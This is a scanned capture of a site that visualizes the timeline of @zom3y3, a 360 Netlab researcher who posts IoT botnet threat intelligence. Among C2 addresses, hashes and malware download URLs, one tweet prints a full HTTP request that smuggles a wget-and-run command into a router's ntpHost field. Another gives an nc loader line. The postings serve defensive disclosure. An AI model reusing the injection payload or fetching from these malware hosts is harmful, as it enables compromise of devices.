thevisualized.com
Open in
urlscan Pro
161.35.51.239
Public Scan
URL:
https://thevisualized.com/twitter/timeline/zom3y3;focused=1064840407308099584
Submission: On July 02 via manual from CA — Scanned from CA
Submission: On July 02 via manual from CA — Scanned from CA
Form analysis 0 forms found in the DOM
Text Content
* ⚽️
* Trends
* Timeline
* Topics & Hashtags
*
--------------------------------------------------------------------------------
* Blog
* About Us
* Contact Us
* Privacy Policy
*
--------------------------------------------------------------------------------
* Like
* Follow
* Subscribe
* Buy me a Coffee
*
* ⚽️
* Trends
* Timeline
* Hashtags
* Blog & More
* Blog
* About Us
* Contact Us
* Privacy Policy
THE VISUALIZED TWITTER PROFILE, ZOM3Y3 (@ZOM3Y3)
Search
Previous Months
Day by Day and Top Twitter Trends with at least a Million Tweets in May 2022
ZoomView 1 monthView 3 monthsView 6 monthsView year to dateView 1 yearView all
Created with Highcharts 10.0.0Chart context menu 29. Apr13. May22. Jul7. Oct13.
Jan1. Jun15. Jun28. Sep9. Nov5. Apr6. Dec29. Apr22. Jul27. Jan15. Jun1. Mar 6.
Dec6. …012040801600300100200400ZoomView 1 month1mView 3 months3mView 6
months6mView year to dateYTDView 1 year1yView allAllApr 10, 2019→Dec 11,
2021RetweetsLikes
zom3y3
#Muhstik #Botnet is spreading through #log4j2 RCE now. Exp:
http://45.130.229.168:9999/Exploit.class https://t.co/NLrnB1K3im
Likes: 316
Retweets: 150
Most Liked Tweet since Apr 10, 2019
Export Line Chart as an Image
SINCE
APR 10, 2019
Include Replies (41)
Include Retweets of others (10)
TWEETS
100
INCLUDING REPLIES, RETWEETS
LIKES
944
AVG. 9.4
RETWEETS
380
AVG. 3.8
zom3y3's profile Visualized: 100 Tweets with 944 Likes and 380 Retweets
Feeling Lucky?
Share Timeline
More Tweets
Ad
1/2
59:57
Next Stay Flycam Trào Lưu Thả Hồn Theo Gió Con Đường Bình Phàm Excuse Me Band -
Nếm TV 40 42 00:00 00:00 / 00:00 10 Sec
ZOM3Y3
@zom3y3
blog.netlab.360.com/author/yegensh…
CHINA
APR 24, 2013
NETWORK SECURITY RESEARCHER @360NETLAB #BOTNET #PENTEST #HONEYPOT #SANDBOX
OPINIONS AND TWEETS ARE MY OWN
225
TWEETS
1.2K
FOLLOWERS
331
FOLLOWING
* MENTIONED (AND REPLIED TO) PROFILES BY ZOM3Y3
Share
* QNAP Systems, Inc. @QNAP_nas
* Hack The World @HacktheWorld13
* 360 Netlab @360Netlab
* Alex @alex_bondage
* SANS.edu Internet Storm Center @sans_isc
* Bad Packets @bad_packets
* Shadowserver @Shadowserver
* if(is) @_ifis
* Chris Dietrich @wavehackr
* Alex Edwards @Alex020811881
* Eliran Liberty إليران الحرية @dontMugyou
* Y Combinator @ycombinator
* Vera Xinyue Shen @xyshen365
* Gitworm @Gi7w0rm
* ManchurianClassmate @wonderqs
* SMII Mondher @smii_mondher
* Michael Genkin @Drag0nR3b0rn
* Intezer @IntezerLabs
* Nacho Sanmillan 𓅓 @ulexec
* n0mad @n0mad42
* Michael Schwarz @misc0110
* ΞnZ0xffff0800 @Meta_Explore
* Masafumi Negishi @MasafumiNegishi
* Markus Dauberschmidt @daubsi
* Dominik @0xTyrox
* Yonathan Klijnsma @ydklijnsma
* daniel:// stenberg:// @bagder
* 𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec
* Mikhail Kasimov @500mk500
* R. @0xrb
* Michal Malík @michalmalik
* RootKiter @RooKiter
* ☩MalwareMustDie @malwaremustd1e
* Cloudflare @Cloudflare
* Pastebin @pastebin
* Xia Tianguo 夏甜果 @xiatianguo
* Eugene Kaspersky @e_kaspersky
* Marco Preuß @marco_preuss
* Dan @_xdanx
* Ankit Anubhav @ankit_anubhav
Created with Highcharts
10.0.0#Botnet#unknown_botnet#botnet_scan#Fbot#IoT#Mozi#Chalubo#unknown_exploit#Muhstik#log4j2#Prometei#CVE_2021_26855#XMRig#WebLogic#phishing#AMT#0day#Dacls#RAT#Lazarus#Gafgyt#Roboto#AVAR2019#Ngioweb#TsunamiChart
context menu
Export Word Cloud as an Image
* SIMILAR PROFILES LIKE ZOM3Y3
Share
* No similar Profile(s), try searching!
Created with Highcharts 10.0.0Chart context menuzom3y3 is mostly active on Thu
around
11PM051015SunMonTueWedThuFri10AM11AM12AM1PM2PM3PM4PM5PM6PM7PM8PM9PM10PM11PMSince
Apr 10, 2019 12 Tweets were posted on Thu around 11PM
Export Activity Heat Map as an Image
Facebook
Twitter
Pinterest
Reddit
Telegram
LinkedIn
Tumblr
Vk
WhatsApp
Line
Gmail
YouTube
Export Line Chart as an Image
Export Word Cloud as an Image
Export Heat Map as an Image
ZOM3Y3'S TWITTER PROFILE SUMMARY
7 #Likes & 4 #Retweets "a new family botnet which contains windows and linux
version. c2: https://t.co/WXKQwAaRtQ https://t.co/ukkxnj82I2"
https://twitter.com/zom3y3/status/1064840407308099584 🗓 Since Apr 10, 2019
posted 100 Tweets and got 944 #Likes and 380 #Retweets 📊 The Visualized Twitter
Profile of zom3y3 zom3y3 (@zom3y3) 1.2K Followers 331 Following 225 Tweets China
📍 Network Security Researcher @360Netlab #Botnet #Pentest #Honeypot #Sandbox
Opinions and tweets are my own
https://thevisualized.com/twitter/timeline/zom3y3;focused=1064840407308099584
Hashtags used by zom3y3 #Muhstik #Botnet #log4j2 #Prometei #CVE_2021_26855
#XMRig #Fbot #WebLogic #IoT #Mozi #phishing #AMT #0day #Chalubo #Dacls #RAT
#Lazarus #Gafgyt #unknown_exploit #Roboto #unknown_botnet #botnet_scan #AVAR2019
#Ngioweb #Tsunami
Mentioned (and Replied to) Profiles by zom3y3 QNAP Systems, Inc. @QNAP_nas, Hack
The World @HacktheWorld13, 360 Netlab @360Netlab, Alex @alex_bondage, SANS.edu
Internet Storm Center @sans_isc, Bad Packets @bad_packets, Shadowserver
@Shadowserver, if(is) @_ifis, Chris Dietrich @wavehackr, Alex Edwards
@Alex020811881, Eliran Liberty إليران الحرية @dontMugyou, Y Combinator
@ycombinator, Vera Xinyue Shen @xyshen365, Gitworm @Gi7w0rm, ManchurianClassmate
@wonderqs, SMII Mondher @smii_mondher, Michael Genkin @Drag0nR3b0rn, Intezer
@IntezerLabs, Nacho Sanmillan 𓅓 @ulexec, n0mad @n0mad42, Michael Schwarz
@misc0110, ΞnZ0xffff0800 @Meta_Explore, Masafumi Negishi @MasafumiNegishi,
Markus Dauberschmidt @daubsi, Dominik @0xTyrox, Yonathan Klijnsma @ydklijnsma,
daniel:// stenberg:// @bagder, 𝙽𝙴𝚃𝚁𝙴𝚂𝙴𝙲 @netresec, Mikhail Kasimov
@500mk500, R. @0xrb, Michal Malík @michalmalik, RootKiter @RooKiter,
☩MalwareMustDie @malwaremustd1e, Cloudflare @Cloudflare, Pastebin @pastebin, Xia
Tianguo 夏甜果 @xiatianguo, Eugene Kaspersky @e_kaspersky, Marco Preuß
@marco_preuss, Dan @_xdanx, Ankit Anubhav @ankit_anubhav
DO YOU FIND THEVISUALIZED HELPFUL?
Support Me, an appreciation with a Subscribe
or got an idea? Hire me, let's work together contact@thevisualized.com
Indie Developer running it, marketing it and supporting it over the Weekends!
Bookmark this Page. Press (Ctrl/Cmd)+D
Trends are visually sorted on the count of platform specific "Data Metrics" to
uncover their Analytical Insights. Do you enjoy such visualizations? Let us know
with your comments, Email and a quick click to Subscribe. Thank You!
Click here to Subscribe!
AD READ MORE Top Articles by Valueimpression Valueimpression YouTube
Billionaires, there’s an easy way to find most viewed Videos on YouTube! | The
Visualized Blog
Unmute Mute
Complete your Technology stack at an amazing rates; links via Amazon Associates.
Proudly hosted on DigitalOcean, get $100 Credits for your Development.
Visualized Timelines are more expressive on Larger (Desktop/Laptops) Screen.
ZOM3Y3
@zom3y3
1.2K Followers
China
Line Chart
Word Cloud
Heat Map
* Most Popular Tweet since Apr 10, 2019
3:23 AM ﹒ Dec 11, 2021
#Muhstik #Botnet is spreading through #log4j2 RCE now. Exp:
http://45.130.229.168:9999/Exploit.class https://t.co/NLrnB1K3im
316
150
* 1:36 AM ﹒ Aug 31, 2021
Retweeted via @360Netlab
Access 360 Netlab's Tweet Here
RT @360Netlab: Our lasted (and possibly the last) update on the mozi botnet,
https://t.co/YNDN6eIO8J
blog.netlab.360.com/the-mostly-dea…
0
12
* 1:37 AM ﹒ May 18, 2021
@QNAP_nas @qnap_psirt yes, we have captured and analyzed the zero-day attack.
https://t.co/Pvr3vzU8NE https://t.co/tEAGWc3KoG
twitter.com/SecurityWeek/s…
0
0
* 1:30 AM ﹒ May 07, 2021
Retweeted via @360Netlab
Access 360 Netlab's Tweet Here
RT @360Netlab: Our follow up blog on the mysterious RotaJakiro backdoor we
published on Apr 28, RotaJakiro appears to be the Linux version…
0
14
* 1:43 AM ﹒ Apr 29, 2021
Retweeted via @360Netlab
Access 360 Netlab's Tweet Here
RT @360Netlab: Our latest blog, a mysterious trojan that has been active for
more than 3 years with 0 Vt detection, we don't exactly know t…
0
32
* 8:14 AM ﹒ Apr 27, 2021
The attacker (182.160.112.151) spent a lot of time to attack the Microsoft
Exchange servers. https://t.co/L4ai9IMcia
0
0
* 8:18 AM ﹒ Apr 19, 2021
#Prometei #botnet is attacking Microsoft Exchange server now. URL:
http://178.21.164.68/dwn.php?b64=1&d=nethost64C.exe Scanner IP:
209.37.253.178 https://t.co/COFoNFO68f
35
20
* 3:42 AM ﹒ Apr 09, 2021
VT Dection https://t.co/Oc7Kx1bQhA https://t.co/9SEcC4ftPx
https://t.co/iNCm8ut0kN
virustotal.com/gui/url/7181f4…
0
0
* 2:32 AM ﹒ Apr 09, 2021
Two follow-ups about Exchange vulnerability attacks: 1. The target email
address include: administrator@btrc.gov.bd , leecher88@hotmail.com 2. An
attacker frequently attacks through the original webshell planting another
webshell(http://182.160.112.151/test/2.aspx ). https://t.co/BP1sQoCoxC
3
3
* 2:13 PM ﹒ Mar 30, 2021
@Hacktheworld13 @360Netlab All the urls mentioned at the end of our blog are
still alive, and you can download these samples :)
1
0
* 6:04 AM ﹒ Mar 26, 2021
#CVE_2021_26855 #XMRig mining attack https://t.co/36zSKrt56q
https://t.co/ZFrGqc5eTT
blog.netlab.360.com/microsoft-exch…
4
2
* 10:57 AM ﹒ Mar 15, 2021
I have caught the PoC, such as implanting webshell, obtaining email
information, etc., and then waiting to see the spread of malicious samples
https://t.co/NyyJLpwsfU
4
1
* 9:44 AM ﹒ Mar 15, 2021
Retweeted via @360Netlab
Access 360 Netlab's Tweet Here
RT @360Netlab: Our latest blog, a new botnet, ZHtrap, turns infected devices
into honeypot to help it find more victims, as well as using p…
0
11
* 7:15 AM ﹒ Mar 10, 2021
@alex_bondage ClickHouse + Redash
0
0
* 6:04 AM ﹒ Mar 10, 2021
Anglerfish honeypot - Microsoft Exchange vulnerability (CVE-2021-26855) scan
in the wild https://t.co/u4cL52WIZn
3
1
* 3:44 AM ﹒ Mar 06, 2021
Retweeted via @360Netlab
Access 360 Netlab's Tweet Here
RT @360Netlab: Our latest blog, QNAP NAS users, check your firmware now, we
started to see attack targeting QNAP NAS 4 days ago, and the at…
0
4
* 1:56 AM ﹒ Mar 04, 2021
We have seen #Fbot #botnet using multiple 0 days before(some of them we have
not disclosed yet) and it has been targeting various IoT devices, now, it is
aiming a new category, traffic and transportation smart devices.
https://t.co/l90JIbx3Mt
twitter.com/360Netlab/stat…
4
0
* 10:42 AM ﹒ Oct 30, 2020
@sans_isc https://t.co/ruk2mnYUIx
twitter.com/zom3y3/status/…
2
2
* 10:31 AM ﹒ Oct 30, 2020
#WebLogic Console Portal vulnerability (CVE-2020-14882) in the wild
https://t.co/CwyboQgo96
3
0
* 1:57 AM ﹒ Oct 15, 2020
@bad_packets Our team (360Netlab) tries to do something, and we have a
channel with CNCERT on handling Mozi Botnet in China, and it's a hard and
complicated work.
0
0
* 0:19 PM ﹒ Oct 14, 2020
@Shadowserver @_ifis @wavehackr https://t.co/SlJw2luHZ0
twitter.com/zom3y3/status/…
1
0
* 10:00 AM ﹒ Oct 14, 2020
There is a new activitiy from a large-scale #IoT #Botnet (#Mozi), it attacks
a lot of IoT devices from China and India. It has no major version updates
from the end of 2019 to August 2020. Winter is Coming ...
https://t.co/SNqju2FJNv
14
11
* 2:12 AM ﹒ Oct 13, 2020
@Alex020811881 @dontMugyou It is a part of payloads which fbot uses linux
command "echo" to write a binary file (fbot downloader), and the other linux
commands also include: wget, tftp. As you can see in the IDA screenshot, if
the "echo" command works well, it will execute the bianry file.
https://t.co/snquaUjREG
0
0
* 7:42 AM ﹒ Oct 10, 2020
The affected telnet banner information in the Fbot sample. url:
http://185.172.110.240/bot.arm4 md5: eecfce993a49eb5bfaed189d5d7dae2e
https://t.co/CX44TSAp83
12
3
* 7:18 AM ﹒ Oct 10, 2020
The latest activities of 2 large-scale botnets: 1. #Mozi #Botnet ip address
switches from India to China 2. #Fbot #Botnet cracks telnet service through
467 sets of hard-coded username and password, which are related to the
banners, and causes a network scan spike from Vietnam.
https://t.co/EoeqGGw5Ic
63
24
* 3:03 PM ﹒ Oct 01, 2020
Retweeted via @360Netlab
Access 360 Netlab's Tweet Here
RT @360Netlab: Our latest blog, A new IoT botnet spreads through two zero-day
vulnerabilities targeting Tenda routers https://t.co/ZpYNjQD…
0
10
* 1:43 AM ﹒ Sep 01, 2020
Retweeted via @360Netlab
Access 360 Netlab's Tweet Here
RT @360Netlab: Our latest blog, a new attack targeting QNAP NAS devices,
there is no public available PoC now, but attacker is quietly usin…
0
17
* 2:33 AM ﹒ Jul 23, 2020
@bad_packets @ycombinator Maybe Synology DSM
1
1
* 2:02 AM ﹒ Jul 23, 2020
@bad_packets 😀https://t.co/HNYZCEjzb6 https://t.co/VxMfzqXuRk
news.ycombinator.com/item?id=239208…
3
0
* 9:03 AM ﹒ Jun 19, 2020
the Stats of Anglerfish Honeypot https://t.co/auycpde39v
https://t.co/1lojV1bxjm
twitter.com/zom3y3/status/…
1
0
* 8:59 AM ﹒ Jun 19, 2020
There are so many honeypots on the Internet that use my fuzzing feature, but
not all of them can capture 0-day vulnerability attacks, nor are they
Anglerfish honeypots. 😉 https://t.co/Ota9HrBp1p
5
1
* 3:08 AM ﹒ Jun 18, 2020
All reports are based on IoT exploits, excluding some protocols such as
Telnet and SSH. https://t.co/W8jp3oF3hi https://t.co/hxCegSoRUy
twitter.com/zom3y3/status/…
2
2
* 1:46 AM ﹒ Jun 17, 2020
@xyshen365 https://t.co/fuZmZFN99L
mp.weixin.qq.com/s/O7IuAZV1Xuog…
0
0
* 6:01 AM ﹒ Jun 16, 2020
Anglerfish Honeypot - IoT Threats Dashboard https://t.co/Uz2UsGfcgf
10
2
* 10:11 AM ﹒ Jun 05, 2020
@Gi7w0rm ClickHouse + Redash
0
0
* 7:07 AM ﹒ Jun 05, 2020
another phishing email subject word cloud https://t.co/KTNTZZyblb
2
1
* 2:55 PM ﹒ Jun 04, 2020
@wonderqs no
0
0
* 9:10 AM ﹒ Jun 04, 2020
https://t.co/ckdNRBhcFc https://t.co/sxZaFP5EDD
twitter.com/zom3y3/status/…
0
0
* 8:04 AM ﹒ Jun 04, 2020
In the past 3 years, my SMTP honeypot received 121,674 deduplicated #phishing
email subjects, and received an average of 2,000 emails per day.
https://t.co/Ab41OLaSOx
0
0
* 11:06 AM ﹒ Jun 02, 2020
More and more Linux/IoT malware samples spread through zero-day
vulnerabilities or multiple n-day vulnerabilities. https://t.co/yoClwrTHHV
7
0
* 1:51 AM ﹒ Jun 02, 2020
@xyshen365 争取近期出一篇分享文章
0
0
* 8:43 AM ﹒ Jun 01, 2020
@smii_mondher ClickHouse + Redash + Yara
0
0
* 8:26 AM ﹒ Jun 01, 2020
IoT N-day exploit statistics report for the past 3 years
https://t.co/cM2S0S6P2q
15
7
* 1:58 PM ﹒ Apr 15, 2020
Retweeted via @360Netlab
Access 360 Netlab's Tweet Here
RT @360Netlab: Our latest blog, Multiple fiber routers are being compromised
by botnets using another 0-day. Three groups are trying to use…
0
6
* 3:17 AM ﹒ Apr 12, 2020
@Drag0nR3b0rn Done. https://t.co/hLpyiivrMQ
2
0
* 6:24 AM ﹒ Apr 11, 2020
It's my analysis notes of 2019 IoT advanced malware threat (AMT ) research.
Hope to study and communicate with you. you can forward it, and leave some
valuable suggestions, thank you. #IoT #AMT https://t.co/uO6LAixI1T
https://t.co/SNu0UiJkoU
docs.google.com/spreadsheets/d…
28
9
* 4:53 PM ﹒ Mar 27, 2020
Packet sniffer is one of the main methods for gathering special information.
#0day https://t.co/aEAphLktKf
twitter.com/360Netlab/stat…
2
0
* 3:58 PM ﹒ Mar 20, 2020
Retweeted via @360Netlab
Access 360 Netlab's Tweet Here
RT @360Netlab: Our latest blog, multiple botnets are spreading using LILIN
DVR 0-day, guess 0 days are no more just reserved for APTs, and…
0
20
* 4:16 AM ﹒ Feb 17, 2020
It shows that some files on these IP address are connected with each other,
and the 0-day attacker behind it is linked to #Chalubo(ChachaDDoS). IoC:
103[.]27.185.139 103[.]82.143.51 https://t.co/U0IFKyow0f
https://t.co/3WdM7oFRvz https://t.co/vowSyJ7g1A https://t.co/2CfcKyWqj9
twitter.com/zom3y3/status/…
9
1
* 2:50 AM ﹒ Jan 21, 2020
@IntezerLabs @ulexec more IoC: https://t.co/YuQT8SEllI
twitter.com/zom3y3/status/…
4
0
* 1:43 AM ﹒ Jan 19, 2020
@n0mad42 😀
1
0
* 0:49 AM ﹒ Dec 18, 2019
New #Dacls #RAT Linked to #Lazarus Group https://t.co/nzCjoJSl1j
https://t.co/vI6EwbYIEt
blog.netlab.360.com/dacls-the-dual…
6
0
* 4:24 AM ﹒ Dec 02, 2019
On Nov 19 2019, I found an unknown exploit was targeting for a webpage named
"sntp", and loading #Gafgyt #Botnet. Samples: http://cncg[.]me/z
#unknown_exploit https://t.co/A0QPBdNGtz
7
0
* 4:17 AM ﹒ Dec 02, 2019
On Aug 30 2019, I found an unknown exploit was targeting for a DVR device,
and loading #Chalubo #Botnet. Still Zero Detection on VT:
http://103[.]27.185.139/icatchplugin1 (10ac26ef8571896efa3ee9495c0b71f5)
http://103[.]27.185.139/icatch.1.3.23s #unknown_exploit
https://t.co/n4Bj5xzvF4
14
2
* 3:44 AM ﹒ Nov 25, 2019
@IntezerLabs @ulexec Related sample: 2808d554258c9d93c44cf259f5627630
1
0
* 2:12 PM ﹒ Nov 20, 2019
#Roboto #Botnet #unknown_botnet https://t.co/aGqiE9xzHW
twitter.com/360Netlab/stat…
0
0
* 4:05 AM ﹒ Nov 11, 2019
Hunting Advanced IoT Malware https://t.co/hdDjSGyXom
drive.google.com/file/d/1XYZu-i…
180
74
* 3:46 AM ﹒ Oct 16, 2019
Botnet Scan Report for Payload MD5: c601610b5a86293af8ac90ff0e43da24 Exploits
Tag: JAWS_DVR_RCE Samples Info: 2019-10-15 00:13:09
07f20725bc544959bdc3b672071a5a33 http://scan[.]switchnets[.]net/x
#botnet_scan https://t.co/KXTaegDx60
4
0
* 4:02 AM ﹒ Oct 12, 2019
The moobot botnet started to infect the Shenzhen TVT camera a few days ago,
and identified the device fingerprint before loading itself, but then it
removed this step and directly worm-scanned and exploited it. Samples Info:
nc 93.174.93.178 31337 #botnet_scan https://t.co/eyK4lgZmvx
33
23
* 7:24 AM ﹒ Sep 26, 2019
Botnet Scan Report for Payload MD5: 5bdc18aad62bda533df6b7f538388a6b Exploits
Tag: Zyxel_VIEWLOG_RCE Samples Info: 2019-09-25 00:15:17
e274ef516bc1577fb2d6e62ac5a6da15 http://136[.]144[.]200[.]209/trixbins.sh
https://t.co/UywdwGFgc5.S #botnet_scan https://t.co/xeMCHqt3AM
TrojanDownloader.SH
5
2
* 11:28 AM ﹒ Sep 20, 2019
When I am hunting for some interesting ELF samples, I find an IoT sample
again which is used for CTF and contains some interesting string. @misc0110
md5: d2769c67b0524eb73fdbbe6eb43ca8f7 Interesting string:
https://t.co/hiKUudsiUZ 185.228.137.2 [ IoT Control Server ]
https://t.co/gKLfKhf5l2
iot.attacking.systems
7
2
* 1:52 AM ﹒ Sep 12, 2019
@Meta_Explore I will publish the English version after #AVAR2019.
1
0
* 2:02 AM ﹒ Sep 06, 2019
@MasafumiNegishi I have noticed it too and it contains XiongMai DVRIP 0-day
RCE exploit which is similar to Fbot's but not the same timestamp in the zip
file or exploit style.
1
0
* 7:40 AM ﹒ Aug 25, 2019
If you want to know how I captured advanced IoT malware. There is a Chinese
version here. https://t.co/FQYzJpoizt
drive.google.com/open?id=1H_NX2…
17
8
* 0:40 PM ﹒ Aug 02, 2019
Some Fiberhome routers are being utilized as SSH tunneling proxy nodes
https://t.co/gOOXxELXUr
blog.netlab.360.com/some-fiberhome…
7
3
* 7:18 AM ﹒ Jul 30, 2019
After decrypting this password, it displays some curse words in Chinese.(狗逼滚)
😅 https://t.co/hF3fovtfIG
0
0
* 4:33 AM ﹒ Jul 26, 2019
@tinyseashells In fact, the "Communication attempt" is a part of
Linux.Ngioweb bot's original behavior and I write is as a subtitle, but I
don't do it. "Communication attempt" is a combined of reverse engineering and
behavior analysis.
1
0
* 4:07 AM ﹒ Jul 26, 2019
@tinyseashells Linux.Ngioweb is a type of Proxy Botnet, I have been hunting
for unknown botnet(#unknown_botnet) for a long time. I can learn a lot of
malware attack and defense skills from it and it's very interesting. 😃
2
1
* 3:43 AM ﹒ Jul 26, 2019
@tinyseashells "Communication attempt" means try to connect to Staget-1 C2.
When it establishes communication with Stage-1 C2, and proceed to the next
step according to the instructions returned by C2. https://t.co/VQniSuBplD
0
0
* 3:32 AM ﹒ Jul 26, 2019
@tinyseashells It's our In-depth analysis report Linux.Ngioweb Botnet for
network security area, and readers need to have some expertise.
1
0
* 3:49 PM ﹒ Jul 24, 2019
https://t.co/UtvABhNF54
exploit-db.com/docs/33253
3
0
* 3:43 PM ﹒ Jul 24, 2019
SQL Injection in Update 🧐 https://t.co/lUrmQLelAT
4
1
* 2:09 PM ﹒ Jul 24, 2019
@daubsi @0xTyrox @ydklijnsma If you want to read more about it, here is a
slideshow about anglerfish honeypot. https://t.co/xA7NnUO9XX
twitter.com/zom3y3/status/…
3
0
* 3:52 AM ﹒ Jul 08, 2019
@360Netlab @bagder curl -H 'accept: application/dns-json' -i
"https://t.co/onMtK23ZIN" https://t.co/yfbg0xigsx
cloudflare-dns.com/dns-query?name…
3
1
* 10:12 PM ﹒ Jul 03, 2019
@netresec mitmproxy
0
0
* 11:32 AM ﹒ Jul 01, 2019
Retweeted via @360Netlab
Access 360 Netlab's Tweet Here
RT @360Netlab: Our latest blog, Godlua Backdoor, it is something a little bit
special, it uses a combination of hardcoded dns name, https:/…
0
31
* 2:47 PM ﹒ Jun 21, 2019
@500mk500 @0xrb Yes, they’re very similar and we have referred this article
in our blog.
2
0
* 10:54 AM ﹒ Jun 21, 2019
#unknown_botnet #Ngioweb https://t.co/YlgaF8wmK1
twitter.com/360Netlab/stat…
4
2
* 1:17 PM ﹒ May 14, 2019
@michalmalik @MasafumiNegishi It shares some codes with mirai, but I don’t
think it’s a mirai variant.
0
0
* 10:54 AM ﹒ May 14, 2019
@MasafumiNegishi @RooKiter has noticed that it’s encryption algorithm is very
similar to fbot which we have reported in our blog. https://t.co/8uDvXF7QZK
https://t.co/q4PLXFAokq
blog.netlab.360.com/the-new-develo…
1
0
* 10:44 AM ﹒ May 14, 2019
@MasafumiNegishi Yes, It's a new version, and adds some mirai's code now.
0
0
* 9:17 AM ﹒ May 14, 2019
It's a new family of DDoS botnet which supports 2 types of DDoS attacks(UDP,
TCP). c2: cnc[.]mariokartayy[.]com:52869 (not active now) md5:
c7f77db8cb3b353b9a238cd7e515de20 https://t.co/aRoXYRA9qx
5
4
* 6:08 AM ﹒ May 11, 2019
@malwaremustd1e @Cloudflare @pastebin 没想到MMD这么不堪一击,笑死我了🤣🤣🤣
指出你的技术错误,你狡辩三连,而且还老是扯上中国威胁论。确实,你们最应该敬畏中国,不仅是在网络安全领域。
0
0
* 7:38 PM ﹒ May 10, 2019
@malwaremustd1e @Cloudflare @pastebin In fact, you have made several wrong
consultations about the malware analysis. Funny enough 🤣🤣🤣🤣🤣🤣🤣🤣🤣
0
0
* 5:13 PM ﹒ May 10, 2019
@malwaremustd1e @Cloudflare @pastebin As I tweeted to you about a week ago,
you made a wrong conclusion about the lua embed botnet. With the help of my
colleague Alex.Turing, I can confirm that it can accept 9 types of commands,
as shown below. Here are some lua binary files, you may want to analysis it.
https://t.co/WWFj0QtmF1
0
0
* 4:35 PM ﹒ May 10, 2019
@malwaremustd1e @Cloudflare @pastebin OK, I will try to communicate whith the
domain owner about the malicious url. BTW, there are two botnets use the
"kerberods" as filename, one is embed lua, and the other one is coded with
golang. Maybe They are from the different botnet group but share some linux
shell code.
0
0
* 4:24 PM ﹒ May 10, 2019
@xiatianguo I have tested it by post parameter, and it doesn't work. BTW,
they have the different file size and embed strings. Thank you anyway.
1
0
* 3:26 PM ﹒ May 10, 2019
@malwaremustd1e @Cloudflare @pastebin You should not block gwjyhs[.]com,
because it is a free images hosting website which used by the attacker.🤣
1
0
* 3:06 PM ﹒ May 10, 2019
https://t.co/SkXSs79GKn
0
0
* 1:25 PM ﹒ May 10, 2019
Do you know this 404 php webshell which file size is about 2.6 KB
https://t.co/8vYVNlwg9B
3
2
* 10:19 AM ﹒ May 08, 2019
It's a new family of IRC botnet which targets for 4 types of operating
systems including MacOS, Linux, FreeBSD and Windows. c2:
uwsedrftgyhujikol[.]sytes[.]net:8080 (not active now) https://t.co/PypMHpJNIS
https://t.co/dJFablGKMB
virustotal.com/#/domain/uwsed…
6
0
* 9:29 AM ﹒ May 08, 2019
It's a new family of DDoS botnet which supports 3 types of DDoS attacks. c2:
176.32.35.23:12956 (not active now) md5: 10c73149cdf2690e7e82b4aec40eb383
#unknown_botnet https://t.co/HXZbB5ULw7
4
0
* 10:37 AM ﹒ May 05, 2019
@malwaremustd1e The C2 is c[.]heheda[.]tk:65314 and d[.]heheda[.]tk:443 is
the download server.
2
0
* 9:39 AM ﹒ May 05, 2019
It's a variant of Tsunami Botnet, and it supports 22 types of DDoS attacks,
kills 360+ known bots(filename), contains 7 methods of exploits and uses
"fast-flux" technology for hiding download server. md5:
8ad6a59dff8fd98529ffab0badec8187 c2: 54.36.212.123:8067 #Tsunami #Botnet
https://t.co/te40MwRaG6
48
13
* 10:28 AM ﹒ Apr 10, 2019
@e_kaspersky @marco_preuss @_xdanx quite different to your most attacked
services https://t.co/UyvnWKdX5N
1
0
* 9:06 AM ﹒ Apr 10, 2019
It accept 2 methods of C2 command, one is download and execute a remote file
and the other one is DDoS attack(TCP Flood, UDP Flood and HTTP Flood).
https://t.co/XCbXLKnkaP
3
1
* 6:28 AM ﹒ Apr 10, 2019
@ankit_anubhav I just catch this exploit payload in my honeypot, and I am not
the one who discover this vuln, so I don't want to request a CVE ID. I have
searched it on google and no thing matched, but there are some devices have
been recorded on shodan.
2
0
* 3:57 AM ﹒ Apr 10, 2019
a new family of DDoS botnet, probably c2: 167.99.8.99:5010 sample url:
http://167[.]99.8.99:80/nr.a6 054ec18660bab0fc4da4d0495c840483
#unknown_botnet https://t.co/UIbw5wbRgl
1
0
* 3:12 AM ﹒ Apr 10, 2019
POST //webs/sysTimeCfgEx HTTP/1.1 Host: {target} Accept-Encoding: identity
Content-Length: 186
systemdate=2019-3-27&systemtime=15:39:32&dwTimeZone=30&updatemode=0&ntpHost=$(wget
http://181.174.166.164/welcom -O/tmp/welcome;/bin/sh
./tmp/welcome)&ntpPort=123&timezonecon=0
2
0
* 2:48 AM ﹒ Apr 10, 2019
@0xrb Yes, It's the newest c2. It changes the c2 after I reported it.
1
0
* Load More Tweets
×
ZOM3Y3 (@ZOM3Y3) , THE VISUALIZED TWITTER PROFILE
Tue Nov 20 11:18:31 +0000 2018
View it on Twitter
a new family botnet which contains windows and linux version. c2:
https://t.co/WXKQwAaRtQ https://t.co/ukkxnj82I2
51.microsft-update.com
Reply
7
Likes
4
Retweets
Twitter Profile Details
Network Security Researcher @360Netlab #Botnet #Pentest #Honeypot #Sandbox
Opinions and tweets are my own
* zom3y3 @zom3y3
* 1.2K Followers
* 331 Following
* China
* blog.netlab.360.com/author/yegensh…
View it on Twitter
Tweet ShareClose
Tweet ShareClose
×
APPRECIATE US ON SOCIAL MEDIA
Like Follow Subscribe
Buy me a Coffee
Email Subscription
Press Ctrl+D to Bookmark this Page.
You intend to comply our Privacy Policy
CoronaVirus over the Time 🦠 Close
Like Follow Subscribe Buy me a Coffee
Copyright © 2022. All rights reserved! - TheVisualized.
By using TheVisualized, you intend to comply our Privacy Policy.
We use cookies on our website to monitize and to provide better user
experience.
You can adjust your google / browser settings or sadly choose not use our
Application.
Ad
Feedback on this ad
Already bought this
Not interested in this
Ad with offensive content
We'll try not to show that ad again
Closing ad...